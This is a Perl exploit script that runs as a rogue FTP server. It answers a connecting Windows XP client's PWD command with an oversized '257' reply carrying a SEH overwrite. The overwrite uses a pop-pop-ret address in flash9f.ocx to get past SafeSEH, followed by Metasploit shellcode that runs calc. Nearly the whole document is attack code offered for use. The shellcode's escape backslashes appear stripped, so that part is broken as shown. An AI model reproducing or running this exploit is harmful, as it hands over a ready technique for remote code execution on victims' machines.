#!/usr/bin/perl
# k`sOSe 08/17/2008
# bypass safeseh using flash9f.ocx.

use warnings;
use strict;
use IO::Socket;

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =	
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x6b".
"xa3x03x10x83xebxfcxe2xf4x97x4bx47x10x6bxa3x88x55".
"x57x28x7fx15x13xa2xecx9bx24xbbx88x4fx4bxa2xe8x59".
"xe0x97x88x11x85x92xc3x89xc7x27xc3x64x6cx62xc9x1d".
"x6ax61xe8xe4x50xf7x27x14x1ex46x88x4fx4fxa2xe8x76".
"xe0xafx48x9bx34xbfx02xfbxe0xbfx88x11x80x2ax5fx34".
"x6fx60x32xd0x0fx28x43x20xeex63x7bx1cxe0xe3x0fx9b".
"x1bxbfxaex9bx03xabxe8x19xe0x23xb3x10x6bxa3x88x78".
"x57xfcx32xe6x0bxf5x8axe8xe8x63x78x40x03x53x89x14".
"x34xcbx9bxeexe1xadx54xefx8cxc0x62x7cx08xa3x03x10";

my @targets = ( "x82x01x02x30", "x82x01x02x30", "x0bx02x01x30" );

if( !defined($ARGV[0]) or $ARGV[0] !~ /^(1|2|3)$/ )
{
	usage();
}

$ARGV[0]--;

my $sock = IO::Socket::INET->new( 
					LocalAddr => '0.0.0.0', 
					LocalPort => '21', 
					Listen => 1, 
					Reuse => 1 
					) || die($!);

while(my $csock = $sock->accept())
{

	print $csock "220 Hello ;)rn"; 
	read_sock($csock);

	print $csock "331 pwd pleasern";
	read_sock($csock);

	print $csock "230 OKrn";
	read_sock($csock);

	print $csock "250 CWD command successful.rn";
	read_sock($csock);

	print $csock	"257 " . "x22"	. 
			"x41" x 324 . 

			"xEBx06x90x90" . # jump ahead
			$targets[$ARGV[0]] . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH  ;)

			$shellcode .

			"x90" x 840 .
			"x22" .
			" is current directory.rn";
		
	close($csock);
	exit;
}



sub read_sock
{
	my ($sock) = @_;

	my $buf = <$sock>;

	print "[client] -> $buf";

}

sub usage
{
	print "usage: $0 [1,2,3]
  1 -> Windows XP SP1
  2 -> Windows XP SP2
  3 -> Windows XP SP3n";
	exit;
}

# www.Syue.com [2008-08-17]